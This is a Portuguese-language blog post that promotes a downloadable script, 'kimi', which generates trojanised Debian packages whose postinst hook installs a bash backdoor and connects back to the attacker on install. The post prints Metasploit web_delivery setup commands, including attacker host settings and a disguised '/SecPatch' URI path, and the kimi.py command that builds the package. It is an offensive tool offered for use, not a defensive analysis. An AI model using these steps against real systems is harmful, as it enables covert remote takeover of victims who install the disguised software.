Browse By

kimi – Script para gerar pacotes Debian maliciosos (trojans do Debian)

Script para gerar pacotes debian maliciosos (deban trojans).
Kimi é um nome inspirado em “Kimimaro”, um dos meus favoritos da anime chamado “Naruto”.
Kimi é um script que gera o pacote malicious debian para metasploitque consiste em arquivo bash. o arquivo bash é implementado no diretório “/ usr / local / bin /”.
O Backdoor é executado apenas quando a vítima tenta instalar o pacote deb devido ao arquivo postinst
O arquivo Bash injeta e também age como um comando do sistema que, quando executado pela vítima e o atacante bate com a sessão.

Mais pontos:

  • Totalmente independente. Significa usuário não precisa instalar nenhum criador do pacote debian
  • Pode ser integrado com qualquer gerador de payload facilmente devido a compromissos de arguemt (coxo: P eu sei) 

Kimi basicamente depende do módulo web_delivery e tudo é automatizado. todas as necessidades do atacante são fazer as seguintes configurações:
Configurando o Web_Delivery no msf:

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

Gerando carga maliciosa: 

[email protected] ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0

NOTA :: Este projeto foi feito para ser integrado ao Venom Shellcode Generator 1.0.13. 
Pode ser usado de forma independente também todas as necessidades do usuário é alterar o uripath em variáveis ​​msf 

Testado em:

  • Linux Mint 17.2 Cinnamon (Ubuntu 14.04) 
  • ParrotOS (Debian Jessie)
  • Kali Rolling 2.0

Atualizações ::: 

-- Added "postinst" file creation function to make embeded malicious file execution automated
-- Added RC file generation function to fully automate with handler opening, means no need to 
    set handler manually
-- Patched some common bugs [special thanks to r00t 3xp10it :)]

Baixar kimi

Deixe uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *

Este site utiliza o Akismet para reduzir spam. Fica a saber como são processados os dados dos comentários.